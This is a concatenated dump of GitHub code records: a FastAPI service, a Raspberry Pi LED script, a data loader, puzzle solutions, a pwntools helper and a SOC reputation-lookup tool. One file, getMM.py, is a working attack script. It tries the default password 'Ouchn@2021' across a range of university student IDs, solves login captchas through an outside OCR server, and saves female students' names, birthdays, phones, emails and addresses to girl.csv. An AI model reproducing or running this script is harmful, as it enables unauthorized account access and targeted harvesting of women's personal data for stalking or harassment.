Elastic\nfrom services.service_utils import get_offset\n\nfrom fastapi.params import Depends\n\n\nclass GenreService:\n def __init__(self, search: BaseSearch):\n self.search = search\n\n @cache\n async def get_genres(self, size: int, page: int) -> Optional[list[dict]]:\n offset = get_offset(page, size)\n res = await self.search.search(index='genres', size=size, offset=offset)\n print('### get_genres:\\n', res)\n return res\n\n @cache\n async def get_genres_search(self, search_query: str, size: int, page: int) -> Optional[list[dict]]:\n offset = get_offset(page, size)\n res = await self.search.search(index='genres', size=size, offset=offset, search_query=search_query)\n return res\n\n @cache\n async def get_genre(self, genre_id: uuid.UUID) -> Optional[dict]:\n res = await self.search.get(index=\"genres\", id=str(genre_id))\n return res\n\n\n@lru_cache()\ndef get_genre_service(\n search: BaseSearch = Depends(Elastic), # type: ignore\n) -> GenreService:\n return GenreService(search)\n","repo_name":"baramba/yap_fastapi","sub_path":"app/services/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33285254332","text":"import RPi.GPIO as GPIO\nimport time\n\nLED1 = 7\t#the pin number of the LED to blink\nLED2 = 8\t#the pin number of the LED to blink\n\ndef main():\n\t# to use Pi cobbler pin numbers\n\tGPIO.setmode(GPIO.BCM)\n\n\t# set up GPIO output channel\n\tGPIO.setup(LED1, GPIO.OUT)\n\tGPIO.setup(LED2, GPIO.OUT)\n\n\t# blink 3 times\n\tfor i in range(0,3):\n\t\tblink(LED1)\n\t\tblink(LED2)\n\n\tGPIO.cleanup() \n\n# blinking function\ndef blink(pin):\n GPIO.output(pin,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(pin,GPIO.LOW)\n time.sleep(1)\n return\n\nif __name__ == 
\"__main__\":\n\tmain()\n","repo_name":"scottbateman/pei-energy-feedback-thingy","sub_path":"lib/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"32338966126","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: Jiong.L\n@time: 2023/2/5 11:53\n\"\"\"\n# -*- coding:utf-8 -*-\nimport sys\nimport time\n\nimport pandas as pd\nimport requests\nimport re\nimport js2py\nimport base64\nimport pickle\nimport os\nimport threading\n\n\nclass NoProblem(BaseException):\n def __init__(self, message=None):\n self.message = message\n\n\nclass Ouchn(object):\n def __init__(self, userCode, userPwd, tmplist):\n\n try:\n if userCode in tmplist:\n now_time = int(time.time())\n with open(f'./tmp/{userCode}', 'rb') as f:\n last_time, name, last_session = pickle.load(f)\n if now_time - last_time < 7200:\n self.session = last_session\n self.name = name\n self.loignStatus = True\n else:\n raise NoProblem('111')\n else:\n raise NoProblem('111')\n except NoProblem:\n self.session = requests.Session()\n self.session.headers.update({\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70 \"\n })\n self.name = None\n self.userCode = userCode\n self.verify_code = None\n self.random_key = None\n self.get_login_page()\n self.userdata = self.encode_data([str(userCode), str(userPwd)])\n self.verifyCode()\n self.login()\n\n def get_login_page(self):\n url = 'https://iam.pt.ouchn.cn/am/UI/Login?realm=%2F&service=initService&goto=https%3A%2F%2Fiam.pt.ouchn.cn' \\\n '%2Fam%2Foauth2%2Fauthorize%3Fservice%3DinitService%26response_type%3Dcode%26client_id' \\\n '%3D345fcbaf076a4f8a%26scope%3Dall%26redirect_uri%3Dhttps%253A%252F%252Fmenhu.pt.ouchn.cn%252Fouchnapp' \\\n '%252Fwap%252Flogin%252Findex%26decision%3DAllow '\n\n req = self.session.get(url)\n if req.status_code == 200:\n regex1 = r\"(?<=name=\\\"random\\\".value=\\\").+(?=\\\")\"\n matches1 = re.search(regex1, req.text).group()\n self.random_key = matches1\n\n regex2 = r\"(?<=name=\\\"SunQueryParamsString\\\".value=\\\").+(?=\\\")\"\n self.sunQueryParamsString = re.search(regex2, req.text).group()\n\n regex3 = r\"(?<=name=\\\"goto\\\".value=\\\").+(?=\\\")\"\n self.goto = re.search(regex3, req.text).group()\n\n def encode_data(self, codes: list):\n def read_json(file_name):\n with open(file_name, 'r', encoding='UTF-8') as file:\n result = file.read()\n return result\n\n js = read_json(\"./des.js\")\n test = js2py.EvalJs()\n test.execute(js)\n result = []\n for i in codes:\n result.append(test.strEnc(i, self.random_key))\n return result\n\n def verifyCode(self):\n url = 'https://iam.pt.ouchn.cn/am/validate.code'\n verify_url = 'https://iam.pt.ouchn.cn/am/validatecode/verify.do'\n req = self.session.get(url)\n if req.status_code == 200:\n code_ocr = requests.post('http://152.67.249.191:9898/ocr/b64/text',\n data=base64.b64encode(req.content).decode())\n if code_ocr.status_code == 200:\n # print(code_ocr.text)\n code_verify = self.session.post(verify_url, data={'validateCode': code_ocr.text}).json()\n if code_verify['state'] == 'success':\n self.verify_code = code_ocr.text\n else:\n for i in range(5):\n self.verifyCode()\n else:\n return False\n\n def login(self):\n login_url = 'https://iam.pt.ouchn.cn/am/UI/Login'\n data = {\n 'IDToken1': self.userdata[0],\n 'IDToken2': self.userdata[1],\n # 'IDToken1': 
'CCCE346E53115CC3B426804C6667F4FE0F65C21D6AF7FEFD2885E0A94909A9AD',\n # 'IDToken2': 'A48351D40F533D4A917A84E2D216C4F7D1A467D82C34A970',\n 'IDToken3': self.verify_code,\n 'goto': self.goto,\n 'gotoOnFail': '',\n 'SunQueryParamsString': self.sunQueryParamsString,\n 'encoded': 'true',\n 'gx_charset': 'UTF-8'\n }\n login_req = self.session.post(login_url, data=data)\n try:\n name_req = self.session.post('https://menhu.pt.ouchn.cn/ouchnapp/wap/user/get-info').json()\n self.name = name_req[\"d\"][\"base\"][\"realname\"]\n except requests.exceptions.JSONDecodeError:\n self.loignStatus = False\n return False\n if login_req.status_code == 200:\n self.tpl_write()\n self.loignStatus = True\n else:\n self.loignStatus = False\n\n def get_data(self):\n test_url = 'https://menhu.pt.ouchn.cn/ouchnproj/wap/xueji/index'\n req: dict = self.session.post(test_url).json()\n if 'm' in req.keys() and req['m'] == \"操作成功\":\n data: dict = req['d']['list'][0]\n else:\n return False\n if data['xbm'] == '女':\n mm_info = {\n '学号': data['xh'],\n '姓名': data['xm'],\n '生日': data['csrq'],\n '电话': data['sjh'],\n '邮箱': data['dzyx'],\n '地址': data['txdzxxdz']\n }\n else:\n return False\n\n return mm_info\n\n def tpl_write(self):\n now = int(time.time())\n with open(f'./tmp/{self.userCode}', 'wb') as f:\n pickle.dump([now, self.name, self.session], f)\n pass\n\n\ndef init():\n if 'tmp' in os.listdir('./'):\n return os.listdir('./tmp')\n else:\n os.mkdir('./tmp')\n init()\n\n\nif __name__ == '__main__':\n print('*' * 30 + '请耐心等待' + '*' * 30)\n print('示意:2251001204320')\n start_nums = int(input('请输入开始账号'))\n end_nums = int(input('请输入需要爬取的数量'))\n thread_nums = int(input('请输入线程数'))\n tmp_list = init()\n list1 = [i for i in range(start_nums, start_nums + end_nums)]\n\n mm_list = []\n\n\n def threading_test(**kwargs):\n ouchn = Ouchn(kwargs['username'], kwargs['password'], tmp_list)\n if ouchn.loignStatus:\n data = ouchn.get_data()\n if data:\n print(data)\n mm_list.append(data)\n\n else:\n print(f'{kwargs[\"username\"]}账号或密码错误')\n\n\n obj = {}\n for i in range(len(list1)):\n obj[i]: threading.Thread = threading.Thread(target=threading_test,\n kwargs={'tmplist': tmp_list, 'username': list1[i],\n 'password': 'Ouchn@2021'})\n obj[i].start()\n obj[i].join()\n while True:\n if len(threading.enumerate()) < 1 + thread_nums:\n break\n\n df = pd.DataFrame(columns=['学号', '姓名', '生日', '电话', '邮箱', '地址'])\n for i in range(len(mm_list)):\n df.loc[i] = mm_list[i]\n if 'girl.csv' in os.listdir('./'):\n df.to_csv('./girl.csv', encoding='utf_8_sig', mode='a', index=False, header=False)\n pass\n else:\n df.to_csv('./girl.csv', encoding='utf_8_sig')\n","repo_name":"klmmlk/ouchn","sub_path":"getMM.py","file_name":"getMM.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34777776747","text":"import pandas as pd\n\n#%%\n\nclass Agriculture:\n \n \"\"\"\n \"\"\"\n \n def __init__ (self, data_path_prefix):\n \n self.data_path_prefix = data_path_prefix\n self.f_name = 'Agriculture.csv'\n \n # data loading \n self.agg = pd.read_excel(self.data_path_prefix + '\\\\' + self.f_name, header = 3)\n \n # unit conversion\n \n\nif __name__ == '__main__':\n \n # Please change the path to data folder per your computer\n input_path_prefix = 'C:\\\\Users\\\\skar\\\\Box\\\\EERE SA Decarbonization\\\\1. 
Tool\\EERE Tool\\\\Data\\\\Script_data_model\\\\1_input_files'\n input_path_aggriculture = input_path_prefix + '\\\\Agriculture'\n \n ob1 = Agriculture(input_path_aggriculture)\n \n print(ob1.agg)","repo_name":"Argonne-National-Laboratory-SAC/DECARB","sub_path":"Agriculture_import.py","file_name":"Agriculture_import.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36458359496","text":"import numpy as np\n\nwith open(\"input_day2.txt\") as f:\n text = f.read()\n\ninstructions = [a for a in text.splitlines()]\n\nhorizontal = 0\ndepth = 0\naim = 0\n\nfor i in instructions:\n commands = i.split(' ')\n word = commands[0]\n distance = int(commands[1])\n if (word[0].startswith('d')):\n aim = aim + distance\n\n elif (word[0].startswith('u')):\n aim = aim - distance\n\n else:\n horizontal = horizontal + distance\n depth = depth + aim * distance\n\nprint(horizontal)\nprint(depth)\nprint(horizontal * depth)\n","repo_name":"s-cooper18/advent-of-code-2021","sub_path":"day2_2.py","file_name":"day2_2.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23536352762","text":"from pwn import *\n\n#def lg(name,addr):\n# log.info(f'{name} -> {addr}')\n#lg(stack,666)\n\ndef lg(*args):\n if len(args) >= 2:\n name = args[0]\n addr = args[1]\n log.info(f'{name} -> {addr}')\n else:\n log.error(\"Insufficient arguments\")\n\nlg(stack, 0x666)\n\n","repo_name":"xiaofeng789/fmt","sub_path":"xmfmt/playfmt/exp66.py","file_name":"exp66.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7960125721","text":"about = '''\nCYBV473 - Violent Python \nDate: 12/12/2020\nFinal Project - SOC Analysis Version 1\n\nThis final project is a multithreading tool to help security \nanalysts to identify a hash, email, IP or URL with a bad \nreputation by automatically querying it into different databases. \n\nCurrent Supported Databases:\n\nhttps://www.virustotal.com/\nhttps://who.is/\nhttps://www.abuseipdb.com/\nhttps://emailrep.io/\n\nThis tool can be used as a GUI (-g), or in a CLI (-q -e ).\n'''\ntest_strings= '''\n======== Test strings: ======= \n\n~~~~~~~\nBad Reputation IP: 45.154.168.201\nGood Reputation IP: 69.63.176.13 (Facebook)\n~~~~~~~\nBad Reputation Hash: b8458d393443ca9b59f4d32a5d31e4f7 (hotpotato.exe privesc hash)\nGood Reputation Hash: 2ee1c17ba0344e6e58c572f52660d1f3 (Internet Explorer)\n~~~~~~~\nGood Reputation url: www.facebook.com\n~~~~~~~\n'''\n\nimport tkinter as tk\nimport tkinter.scrolledtext as scrolledtext\nfrom tkinter import messagebox\n\nimport argparse\nimport requests\nimport json\nfrom prettytable import PrettyTable\nfrom threading import Thread\n\n# API Keys that I use through the code. 
Usually I would put those in a separate .conf file.\n\nvirusTotal_API = \"\"\nabuseipdb_API = \"\"\nemailRepio_API = \"\"\n\nproject = '''\n=====================================================\n _______ ________ ___ _ ______ ____ \n / ____\\ \\ / | _ \\ \\ / | || |____ |___ \\ \n | | \\ \\_/ /| |_) \\ \\ / /| || |_ / / __) |\n | | \\ / | _ < \\ \\/ / |__ _|/ / |__ < \n | |____ | | | |_) | \\ / | | / / ___) |\n \\_____| |_________/ \\/ __|/_/ |____/ \n | ____(_) | | \n | |__ _ _ __ __ _| | \n | __| | | '_ \\ / _` | | \n | | | | | | | (_| | | \n |_| |_|_| |_|\\__,_|_| \n=====================================================\n'''\n\nprint(project)\n\n'''\nFunction to check email reputation\nThis will query the database https://emailrep.io/, send the \nstring, parse the results, input the results into a table, \nand print the table to the user.\n'''\ndef emailrep(query_string,results_box):\n scan_title = \"\\n\\n==========> Emailrep.io Results: <==========\\n\\n\" \n value = string_type(query_string)\n report = \"\"\n if value == 'email':\n try:\n url = 'https://emailrep.io/' + query_string + '?summary=true'\n params = {'Key': emailRepio_API, 'User-Agent': \"CYBV473-Final\"} \n response = requests.get(url, params=params)\n \n req = response.json()\n emailDomain = query_string.split('@')[1]\n \n email_tbl = PrettyTable()\n domain_tbl = PrettyTable()\n malicious_tbl = PrettyTable()\n \n email_tbl.field_names = [\"Data\", \"Result\"]\n domain_tbl.field_names = [\"Data\", \"Result\"]\n malicious_tbl.field_names = [\"Data\", \"Result\"]\n \n email_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n domain_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n malicious_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n \n if response.status_code == 400:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, 'Invalid Email / Bad Request')\n else:\n print(scan_title)\n print('Invalid Email / Bad Request')\n return 0\n \n if response.status_code == 429:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, 'Too many requests (Free API - 10/day)')\n else:\n print(scan_title)\n print('Too many requests (Free API - 10/day)') \n return 0\n \n if response.status_code == 200: \n \n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n if req['suspicious'] == True:\n report += \"The email appears to be suspicious.\"\n else:\n report += \"The email does not appear to be suspicious.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n \n email_tbl.add_row([\"Email\", req['email']])\n email_tbl.add_row([\"Reputation\", req['reputation']])\n email_tbl.add_row([\"Suspicious\", req['suspicious']])\n email_tbl.add_row([\"Spotted\", str(req['references']) + ' Times'])\n email_tbl.add_row([\"Blacklisted\", req['details']['blacklisted']])\n email_tbl.add_row([\"Last Seen\", req['details']['last_seen']])\n email_tbl.add_row([\"Known Spam\", req['details']['spam'] ])\n \n malicious_tbl.add_row([\"Malicious Activity::\", req['details']['malicious_activity'] ])\n malicious_tbl.add_row([\"Recent Activity::\", req['details']['malicious_activity_recent'] ])\n malicious_tbl.add_row([\"Credentials Leaked:\", req['details']['credentials_leaked'] ])\n malicious_tbl.add_row([\"Found in breach:\", req['details']['data_breach'] ])\n \n domain_tbl.add_row([\"Domain\", emailDomain ])\n domain_tbl.add_row([\"Domain Exists:\", req['details']['domain_exists'] ])\n domain_tbl.add_row([\"Domain Rep:\", req['details']['domain_reputation'] ])\n 
domain_tbl.add_row([\"Domain Age:\", str(req['details']['days_since_domain_creation']) + ' Days' ])\n domain_tbl.add_row([\"New Domain:\", req['details']['new_domain'] ])\n domain_tbl.add_row([\"Deliverable:\", req['details']['deliverable'] ])\n domain_tbl.add_row([\"Free Provider:\", req['details']['free_provider'] ])\n domain_tbl.add_row([\"Disposable:\", req['details']['disposable'] ])\n domain_tbl.add_row([\"Spoofable:\", req['details']['spoofable'] ])\n\n except:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, 'Error accessing https://emailrep.io/')\n else:\n print(scan_title)\n print('Error accessing https://emailrep.io/') \n \n email_tbl.align = \"l\" \n domain_tbl.align = \"l\" \n malicious_tbl.align = \"l\" \n \n email_String = email_tbl.get_string()\n domain_String = domain_tbl.get_string()\n malicious_String = malicious_tbl.get_string()\n \n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,report + \"\\n\")\n results_box.insert(tk.END,'\\n Email Analysis Report\\n')\n results_box.insert(tk.END, email_String)\n results_box.insert(tk.END,'\\n Domain Report\\n')\n results_box.insert(tk.END, domain_String)\n results_box.insert(tk.END,'\\n Malicious Activity Report\\n')\n results_box.insert(tk.END, malicious_String)\n \n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report)\n print('\\n Email Analysis Report\\n')\n print(email_String)\n print('\\n Domain Report\\n')\n print(domain_String)\n print('\\n Malicious Activity Report\\n')\n print(malicious_String)\n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title + 'Value does not appear to be a valid email')\n else:\n print(scan_title)\n print('Value does not appear to be a valid email') \n\n\n\n\n'''\nFunction to check the whois database\nThis will query the database https://who.is/, send the\nstring, parse the HTML results and return the results to the user.\nI attempted to parse the HTML code without the use of any other \nthird_party libraries. Next Version I should use the Beautifulsoup library. 
\n\n'''\ndef whois_Lookup(query_string,results_box):\n scan_title = \"\\n\\n==========> Who.is Information: <==========\\n\\n\" \n value = string_type(query_string)\n report = \"\"\n \n registrar_tbl = PrettyTable()\n name_servers_tbl = PrettyTable()\n similar_domains_tbl = PrettyTable()\n registrar_data_tbl = PrettyTable()\n \n registrar_tbl.field_names = [\"Data\", \"Result\"]\n name_servers_tbl.field_names = [\"Data\", \"Result\"]\n similar_domains_tbl.field_names = [\"Data\", \"Result\"]\n registrar_data_tbl.field_names = [\"Data\", \"Result\"]\n \n registrar_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n name_servers_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n similar_domains_tbl._max_width = {\"Data\" : 40, \"Result\" : 40} \n registrar_data_tbl._max_width = {\"Data\" : 40, \"Result\" : 40} \n \n nomatch = 0\n if value == 'url':\n if '//' in query_string:\n query_string = query_string.split('//')[1]\n url = 'https://who.is/whois/' + query_string\n response = requests.get(url)\n \n if \"No match for\" in response.text:\n nomatch = 1\n else:\n registrar = response.text.split('Name Servers')[0]\n name_servers = response.text.split('Name Servers')[1].split('Similar Domains')[0]\n similar_domains = response.text.split('Name Servers')[1].split('Similar Domains')[1].split('Registrar Data')[0]\n registrar_data = response.text.split('Name Servers')[1].split('Similar Domains')[1].split('Registrar Data')[1]\n \n \n # Registrar Info / Important Dates \n for i in range (len(registrar.split('queryResponseBodyKey'))):\n key = CleanString(registrar.split('queryResponseBodyKey')[i].split('<')[0][2:]) # key\n key_value = CleanString(registrar.split('queryResponseBodyValue\">')[i].split('<')[0]) # value\n registrar_tbl.add_row([key,key_value])\n \n #name servers\n i=1\n while i < (len(name_servers.split('queryResponseBodyValue\">'))):\n key = CleanString(name_servers.split('queryResponseBodyValue\">')[i].split('>')[1].split('<')[0]) # key \n key_value = CleanString(name_servers.split('queryResponseBodyValue\">')[i+1].split('>')[1].split('<')[0]) # value\n name_servers_tbl.add_row([key,key_value])\n i = i + 2\n \n # Similar Domains \n i=1\n while i < (len(similar_domains.split('href'))):\n #similar_domains.split('href')[i].split('>')[1].split('<')[0]\n similar_domains_tbl.add_row(['Similar domain:', CleanString(similar_domains.split('href')[i].split('>')[1].split('<')[0])])\n i = i + 1\n \n #Registrar Data \n i=1\n while i < (len(registrar_data.split('strong'))):\n key = CleanString(registrar_data.split('strong')[i][1:-2]) # key\n key_value = CleanString(registrar_data.split('strong')[i+1].split('>')[3].split('<')[0]) # value\n registrar_data_tbl.add_row([key,key_value])\n i = i + 2\n \n if value == 'ip':\n url = 'https://who.is/whois-ip/ip-address/' + query_string\n response = requests.get(url)\n \n if \"No match for\" in response.text:\n nomatch = 1\n else:\n s = response.text\n \n start = s.find('
<pre>') + len('<pre>')  # the raw whois text is expected inside the page's <pre> block\n            end = s.find('</pre>
')\n report = s[start:end]\n \n \n registrar_tbl.align = \"l\" \n name_servers_tbl.align = \"l\" \n similar_domains_tbl.align = \"l\" \n registrar_data_tbl.align = \"l\" \n \n if theArgs.gui:\n if value == \"ip\":\n if nomatch == 0:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,CleanString(report))\n else:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, \"IP not found in this database\")\n elif value == 'url':\n if nomatch == 0:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nRegistrar Info\\n\")\n resultString = registrar_tbl.get_string() \n results_box.insert(tk.END,resultString)\n results_box.insert(tk.END,\"\\nName Servers\\n\")\n resultString = name_servers_tbl.get_string() \n results_box.insert(tk.END,resultString)\n results_box.insert(tk.END,\"\\nSimilar domains\\n\")\n resultString = similar_domains_tbl.get_string() \n results_box.insert(tk.END,resultString)\n results_box.insert(tk.END,\"\\nRegistrar data\\n\")\n resultString = registrar_data_tbl.get_string() \n results_box.insert(tk.END, resultString)\n else:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, \"URL not found in this database\")\n else:\n results_box.insert(tk.END, scan_title + \"The string does not appear to be a ip or url\") \n else:\n if value == \"ip\":\n if nomatch == 0:\n print(scan_title)\n print(report)\n else: \n print(scan_title)\n print(\"IP not found in this database\")\n elif value == 'url':\n if nomatch == 0:\n print(scan_title)\n print(\"Registrar Info\")\n resultString = registrar_tbl.get_string() \n print(resultString)\n print(\"Name servers\")\n resultString = name_servers_tbl.get_string() \n print(resultString)\n print(\"Similar domains\")\n resultString = similar_domains_tbl.get_string() \n print(resultString)\n print(\"Registrar data\")\n resultString = registrar_data_tbl.get_string() \n print(resultString)\n else:\n print(scan_title)\n print(\"URL not found in this database\")\n else:\n print(scan_title)\n print(\"The string does not appear to be a ip or url\") \n \n\n\n'''\nFunction to check the VirusTotal database:\nThis will query the database https://www.virustotal.com/, send the\nstring, depending on the type of string (url,hash or ip), the code \nparses the result and return to the user accordingly.\n'''\ndef virustotal(query_string,results_box):\n scan_title = \"\\n\\n==========> Virustotal Results: <==========\\n\\n\" \n report = \"\"\n\n value = string_type(query_string)\n \n if (value == \"ip\"):\n url = 'https://www.virustotal.com/vtapi/v2/ip-address/report'\n params = {'apikey': virusTotal_API, 'ip': query_string}\n response = requests.get(url, params=params)\n if response.status_code == 200: \n if 'IP address in dataset' in response.json()['verbose_msg']:\n try:\n report += \"Owner: \" + CleanString(response.json()['as_owner']) + \"\\n\"\n except:\n pass\n report += \"\\nPassive DNS Replication:\\n\"\n for i in range(0,len(response.json()['resolutions'])):\n report += \" \" + CleanString(response.json()['resolutions'][i]['hostname']) + \"\\n\"\n \n # trying to to get url reputation\n url = 'https://www.virustotal.com/vtapi/v2/url/report'\n params = {'apikey': virusTotal_API, 'resource': query_string}\n response = requests.get(url, params=params)\n report += \"\\n\"\n report += \"Detected as Malicious by: \" + str(response.json()['positives']) + \" engines\\n\"\n report += \"Total number of engines: \" + str(response.json()['total'])\n \n else:\n report += \"The IP does not appear to be part 
of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n report += json.dumps(response, sort_keys=False, indent=4)\n \n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nError: \" + str(response.status_code))\n else:\n print(\"error: \" + response.status_code) \n \n \n elif (value == \"url\"): \n url = 'https://www.virustotal.com/vtapi/v2/url/report'\n params = {'apikey': virusTotal_API, 'resource': query_string}\n response = requests.get(url, params=params) \n if response.status_code == 200: \n result = response.json()\n \n if 'The requested resource is not among the finished, queued or pending scans' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The URL does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n elif 'Resource does not exist in the dataset' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The URL does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n elif 'Invalid resource, check what you are submitting' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"Invalid resource, check what you are submitting.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n else:\n list_a = result['scans'].keys()\n detected = 0 \n tbl = PrettyTable()\n tbl.field_names = [\"Engine\", \"Result\", \"Detected\"]\n \n for i in list_a:\n tbl.add_row([i, result['scans'][i]['result'], result['scans'][i]['detected']])\n if result['scans'][i]['detected'] == True:\n detected = detected + 1\n \n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The URL was detected as malicious by \" + str(detected) + \" out of \" + str(len(list_a)) + \" engines\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n'\n report += \"Full Report:\\n\\n\"\n \n tbl.align = \"l\" \n tbl.sortby = \"Detected\"\n tbl.reversesort = True\n resultString = tbl.get_string()\n \n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, resultString)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n print(resultString) \n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nError: \" + str(response.status_code))\n else:\n print(\"error: \" + response.status_code) \n \n elif (value == \"hash\"):\n url = 'https://www.virustotal.com/vtapi/v2/file/report'\n params = {'apikey': virusTotal_API, 'resource': query_string}\n response = requests.get(url, params=params)\n\n if response.status_code == 200: \n result = response.json()\n \n if 'The requested resource is not among the finished, queued or pending scans' in 
result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The hash does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n report += json.dumps(response, sort_keys=False, indent=4)\n \n if 'Invalid resource, check what you are submitting' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"Invalid resource, check what you are submitting.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n report += json.dumps(response, sort_keys=False, indent=4) \n \n else:\n list_a = result['scans'].keys()\n detected = 0 \n tbl = PrettyTable()\n tbl.field_names = [\"Engine\", \"Result\", \"Detected\", \"Updated\"]\n tbl._max_width = {\"Engine\" : 20, \"Result\" : 20, \"Detected\" : 20 , \"Updated\" : 20}\n \n for i in list_a:\n tmpdate = result['scans'][i]['update']\n tbl.add_row([i, result['scans'][i]['result'], result['scans'][i]['detected'], tmpdate[4:6] + '-' + tmpdate[6:8] + '-' + tmpdate[0:4]])\n if result['scans'][i]['detected'] == True:\n detected = detected + 1\n \n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The hash was detected as malicious by \" + str(detected) + \" out of \" + str(len(list_a)) + \" engines\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"\\nFull Report:\\n\\n\"\n \n tbl.align = \"l\" \n tbl.sortby = \"Detected\"\n tbl.reversesort = True\n resultString = tbl.get_string()\n\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, resultString)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n print(resultString)\n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nError: \" + str(response.status_code))\n else:\n print(\"error: \" + str(response.status_code)) \n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title + \"The string does not appear to be a URL, IP or Hash\")\n else:\n print(scan_title)\n print(\"The string does not appear to be a URL, IP or Hash\") \n \n\n\n'''\nFunction to check the abuseipdb database\nThis will query the database https://www.abuseipdb.com/, send the\nstring, the code parses the result and return to the user accordingly.\n'''\ndef abuseipdb(query_string,results_box):\n scan_title = \"\\n\\n==========> AbuseIPDB Results: <==========\\n\\n\"\n report = \"\" \n value = string_type(query_string)\n \n if (value == \"ip\"): \n try:\n \n AB_URL = 'https://api.abuseipdb.com/api/v2/check'\n days = '180'\n querystring = {'ipAddress': query_string,'maxAgeInDays': days}\n headers = {'Accept': 'application/json','Key': abuseipdb_API}\n response = requests.request(method='GET', url=AB_URL, headers=headers, params=querystring)\n \n if response.status_code == 200:\n req = response.json()\n report += \"\\nIP: \" + CleanString(str(req['data']['ipAddress']))\n report += \"\\nReports: \" + CleanString(str(req['data']['totalReports']))\n report += \"\\nAbuse Score: \" + CleanString(str(req['data']['abuseConfidenceScore']) + \"%\")\n report += \"\\nLast Report: \" + CleanString(str(req['data']['lastReportedAt']))\n \n else:\n report += \"Error Reaching ABUSE IPDB\"\n\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n else:\n print(scan_title)\n print(AIPDB_report) \n except:\n report += ' IP Not Found'\n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title + 'Value does not appear to be a 
